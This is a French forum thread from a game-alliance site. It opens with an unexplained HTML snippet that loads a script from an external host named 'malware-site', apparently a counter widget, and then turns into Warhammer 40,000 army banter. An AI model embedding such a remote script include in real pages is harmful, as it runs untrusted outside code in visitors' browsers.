Forum ABA et ABA.W(http://aba.ogameteam.com)
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.
Le Deal du moment : -38%
Ecran PC gaming 23,8″ – ACER KG241Y P3bip ...
Voir le deal
99.99 €

quelque code html

3 participants

quelque code html Empty quelque code html

Message par exterminateur Jeu 8 Mai - 12:01

<script>var compteurcc_adultvar = "0";</script>
<script src="http://www.malware-site.wwwcompteur.php?c=newonline1&id=577082"></script>
<noscript><a href="http://www.bloguez.com">recherche blog</a></noscript>

exterminateur

Revenir en haut Aller en bas

quelque code html Empty Re: quelque code html

Message par Kurtz Ven 30 Mai - 11:26

euh c'est bien mais si ya que toi qui sait ce que ça veut dire et à quoi correspond le code, c'est super interressant cyclops cyclops

bon sinon, je m'y connais pas mal en codage HTML,XML,java script, etc...

donc si vous avez besoin d'un petit renseignement, demandez toujours Razz
Kurtz
Kurtz
Invité d'Honneur
Invité d'Honneur

Message par creed Ven 30 Mai - 15:10

Kurtz a écrit:euh c'est bien mais si ya que toi qui sait ce que ça veut dire et à quoi correspond le code, c'est super interressant cyclops cyclops

bon sinon, je m'y connais pas mal en codage HTML,XML,java script, etc...

donc si vous avez besoin d'un petit renseignement, demandez toujours Razz

ouais je crois que enigma l'avait dechiffre
en regardant ton avatar je me demandais si tu connaisais bien warhammer 40 000
creed
creed
Admin
Admin

http://ogame.fr

Message par Kurtz Ven 30 Mai - 18:23

et comment que je connais bien!

j'ai une armée complète d'orks Razz

et j'ai joué pas mal de temps au jeu "Dawn of war" un jeu qui reprend assez bien warhammer 40 000
Kurtz
Kurtz
Invité d'Honneur
Invité d'Honneur

Message par creed Ven 30 Mai - 19:22

il est trop cool ce jeu dawn of war avec ces extensions

Moi sa fait 10 ans que j'y joue et je joue une enorme armee de Cadiens et il y a 3 ans j'ai commence a me faire une ost chevaliers gris qui est pas mal et qui boufferait sans probleme ta waagh

sinon tu as quoi comme style de jeu
creed
creed
Admin
Admin

Message par Kurtz Ven 30 Mai - 22:29

ouawwwwww mais ça fait longtemps que je n'y ais pas joué faute d'adversaire Razz
au moins 8ans rabbit

mais sinon, mon style de jeu était plutôt on fonce, on écrase tout et on nettoie avec les boites kitue clown

enfaite, je passais très vite à l'attaque avec truks, traks et motos de guerre, je dégageais le terrain
ensuite venaient très vite mes chokboys avec leurs grosse roquettes sur le dos Basketball
puis il y avait la vague de blindboys,pistolboys et flingboys sans oublier mes petits kramboys et casseurs de tanks

derrière j'avais 3 Batteries de Grocalibr
et quand devant, le plus gros du boulo était fait, les Boit'Kitu + Dragnought nettoyaient tout avec mon GhazchKull et sa garde rapproché (Nobs en méga-armure et gros mec)

enfin, c'était du lourds Razz Razz
Kurtz
Kurtz
Invité d'Honneur
Invité d'Honneur

Message par creed Ven 30 Mai - 22:33

Kurtz a écrit:ouawwwwww mais ça fait longtemps que je n'y ais pas joué faute d'adversaire Razz
au moins 8ans rabbit

mais sinon, mon style de jeu était plutôt on fonce, on écrase tout et on nettoie avec les boites kitue clown

enfaite, je passais très vite à l'attaque avec truks, traks et motos de guerre, je dégageais le terrain
ensuite venaient très vite mes chokboys avec leurs grosse roquettes sur le dos Basketball
puis il y avait la vague de blindboys,pistolboys et flingboys sans oublier mes petits kramboys et casseurs de tanks

derrière j'avais 3 Batteries de Grocalibr
et quand devant, le plus gros du boulo était fait, les Boit'Kitu + Dragnought nettoyaient tout avec mon GhazchKull et sa garde rapproché (Nobs en méga-armure et gros mec)

enfin, c'était du lourds Razz Razz

ouais je voulais verifie si tu savais joue c'est bon car je deteste les lents pour avance autant pas ojue avec eux moi
je nettoie tout avec leman RUSS et Basilik j'avance avec la masse plus de 200 hommes je fait une rafale de tirs et j'envois l'assasin Callidus qui depiote facilement des heros et de la masse avec son lance flamme F 8 PA 1 ignore toute les sauvegarde

et avec les chevaliers gris qui sorte du Land raider je nettoie les troupes d'elite adverse
creed
creed
Admin
Admin

Message par Kurtz Ven 30 Mai - 22:34

d'ailleurs, je viens de me replonger dans mon vieux codex et j'ai trouvé deux trois petits trucs sympatoches :

Big Boss Ghazghkull Mag Uruk Thraka

Chui la main de Gork et Mork, y mon envoyé afin d'emmener les boyz détruire é tuer, a kauz ky zont oublié kzai pourssa ki sont là. J'étais just un boy jusko jour ouk lé dieu y môn frappé dans la tê ék jme sui rapplé klé zorks y sont fait pour konkérir et réduir les zaut en esklvaj.

Chui l'serviteur d'la Waaagh! et des mondes entiers brûlent dans mon sillaj'. Sur Armour Geddem, j'ai entraîné lé ga à travers les dezerts de feu é réduit les cités de fer des zumains en bouilli. j'ai kombattu l'vieux Yarrick n'a k'in oeil sur Tartarus; y s'est bien battu, mais on a ékrazé sa cité kan même.

Chui la mort pour tout ski ramp' ou ki marche, ou ke je vé rien m'résiste. on a ékrazé les nabots sur Golgotha et on a choppé l'vieux Yarrick, kan les fondus d'la vitess' ont fait sauté en morceaux les tanks dé zumains. J'lai laissé partir a kauz k'lé bon zennemis, cé du à trouver et klé zorks y zont bzoin d'ennemi à kombattre, d'viande à manger et d'bière de squig à boire.

Chui plus malin qu'un gretchin et plus mortel qu'un dreadnought, lé ga ki m'suivent y peuv' pas perdre. Sur pissenah on est tombé sur lé marineboyz et komça on eu plein d'emblèmes pour nos bannières avek les kask des morts. On a brulé leur baze, tué leurs chefs et laissé rien kdé ruines.

Chui l'tout puissant seigneur Ghazghkull Mag Uruk Thraka, et ch'parle avek la voix des dieux. On va ékrabouiller l'univers et tuer tous ceux ki s'rebifron. Et on l'fra a kauz kon é dé zorks et kon é fé pour s'batt et gagner.
Kurtz
Kurtz
Invité d'Honneur
Invité d'Honneur

Message par Kurtz Ven 30 Mai - 22:37

sauf que moi, je suis direct au corps à corps et que personne peut rivaliser avec les orks au corps à corps cyclops cyclops

et les leman russ, un coup d'fling' et hop, boom ça pèt' Razz Razz

nan sérieusement, je foutais le bordel à chaque fois vu que le nombre de petits hommes verts que j'avais étaient en général assez supérieur aux autres Basketball
Kurtz
Kurtz
Invité d'Honneur
Invité d'Honneur

Message par creed Ven 30 Mai - 22:40

ouais mais a 4 pts le cadet sa m'etonnerait

et puis je m'en fous avec la puissance de feu que j'ai approche toi

a 24 pouce plus de 500 tirs
creed
creed
Admin
Admin

Message par Kurtz Ven 30 Mai - 22:43

m'en fou, j'ai des commandos spécial corps à corps clown clown

enfaite, j'ai la moitié de mes boys avec deux armes de corps à corps bounce bounce

un carnage^^, je vais faire de la boullie de tes grosses bébètes
Kurtz
Kurtz
Invité d'Honneur
Invité d'Honneur

Message par creed Ven 30 Mai - 22:47

ouais mais un chevaliers gris de base a 3 attaques en comptant les deux armes de corps a corps et chaques chef d'escouade 4 avec arme energetique sa calme assez sans comptez que chaque chef d'escouade a un pouvoir psichique force 6 attaques 1D6
et le chef supreme a une attaque qui fait que si il blesse il doit faire lui un test de commandement et si il le reussi son adversaire et mort sans aucune possibilites de survie cerveau grille
creed
creed
Admin
Admin

Message par Kurtz Ven 30 Mai - 22:53

m'en fou, je risque rien, mes orks n'ont pas de cerveaux Razz
Kurtz
Kurtz
Invité d'Honneur